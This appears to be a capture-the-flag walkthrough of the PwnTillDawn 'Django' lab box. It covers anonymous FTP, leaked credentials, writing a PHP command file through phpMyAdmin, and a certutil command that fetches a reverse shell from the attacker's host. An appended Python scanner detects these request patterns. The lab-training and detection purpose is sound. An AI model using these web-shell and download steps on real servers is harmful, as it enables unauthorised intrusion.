PwnTillDawn Django Walkthrough

Syphonetic
Apr 13, 2021

Introduction to PwnTillDawn

“PwnTillDawn Online Battlefield is a penetration testing lab created by wizlynx group where participants can test their offensive security skills in a safe and legal environment, but also having fun!”

Link: https://www.wizlynxgroup.com/ || https://online.pwntilldawn.com/

Django

This box has 4 flags to submit, and they can be obtained in numerous ways.

Reconnaissance

Nmap scan results
Nikto scan results

Walkthrough

We logged in to FTP with anonymous credentials and found that we could traverse directories. Listing the directory, we saw a FLAG directory, xampp-control.log and zen.txt.

We downloaded the files and looked at their content. An interesting line in xampp-control.log points us to a text file that potentially contains credentials.

Content of xampp-control.log

Using the get command, we downloaded passwords.txt to our system and viewed its content. Sure enough, it contains a set of credentials.

FLAG20.txt

Before making use of the credentials, we listed the files in “C:\xampp” from our FTP session and found FLAG20.txt residing in that same folder. Downloading the file gives us the flag.

Using the credentials from passwords.txt, we browsed to http://10.150.150.212/phpmyadmin/ and logged in.

FLAG18

Digging around phpMyAdmin shows the flag for FLAG18 under Databases.

Digging further, we found the SQL tab, which we can use to write a file onto the server.

Creating a file test2.php on the server

Once the command is executed, we can access test2.php and run a command to verify that it works.

After confirming that the PHP upload works, we use it to download a webshell from our host machine via the following URL:

http://10.150.150.212/test2.php?cmd=certutil -urlcache -split -f http://10.66.67.50/php_reverse_shell.php shell.php

For more information on this file upload method, there is a very informative guide that lists the methods that can be used.

Credits: https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

Once the shell has been downloaded, we set up a netcat listener, access shell.php, and receive a shell.
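As an added example that is not part of the original post, here is the defender-side view of the steps above: a Python scan over XAMPP/Apache access-log lines that flags PHP requests carrying a shell-style query parameter or a certutil -urlcache download in the query string. The sample log lines, the parameter-name list and the log-format regex are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Simplified Apache common log format, as written by XAMPP's access.log (assumed layout).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Query-parameter names typically used by simple PHP web shells (assumed list).
SHELL_PARAMS = {"cmd", "c", "exec", "command"}
# The LOLBin download pattern used in the walkthrough: certutil -urlcache ... -f <url>
CERTUTIL_RE = re.compile(r'certutil(?:\.exe)?\s+.*-urlcache', re.IGNORECASE)

def analyze_line(line):
    """Return a finding dict for a suspicious PHP request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a log line we understand
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith(".php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    reasons = []
    for name, values in params.items():
        if name.lower() in SHELL_PARAMS:
            reasons.append(f"shell-style parameter '{name}' on {parts.path}")
        if any(CERTUTIL_RE.search(v) for v in values):
            reasons.append("certutil -urlcache download passed via query string")
    if not reasons:
        return None
    return {"src": m.group("src"), "time": m.group("ts"), "path": parts.path, "reasons": reasons}

def scan(lines):
    """Run analyze_line over every line and keep only the findings."""
    return [f for f in map(analyze_line, lines) if f]

# Constructed sample log lines; the third mirrors the walkthrough's certutil request.
SAMPLE_LOG = [
    '10.66.67.50 - - [13/Apr/2021:10:01:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 5123',
    '10.66.67.50 - - [13/Apr/2021:10:05:44 +0000] "GET /test2.php?cmd=whoami HTTP/1.1" 200 31',
    '10.66.67.50 - - [13/Apr/2021:10:06:10 +0000] "GET /test2.php?cmd=certutil%20-urlcache%20-split%20-f%20http://10.66.67.50/php_reverse_shell.php%20shell.php HTTP/1.1" 200 210',
    '10.66.67.50 - - [13/Apr/2021:10:06:30 +0000] "GET /shell.php HTTP/1.1" 200 0',
    '192.0.2.7 - - [13/Apr/2021:10:07:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 1040',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["src"], f["path"], "; ".join(f["reasons"]))
```

The plain request to shell.php is not flagged on its own, so in practice this check is paired with monitoring for new .php files appearing under the web root.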

FLAG19.txt

FLAG11.txt

Hope this walkthrough helps people who are stuck!
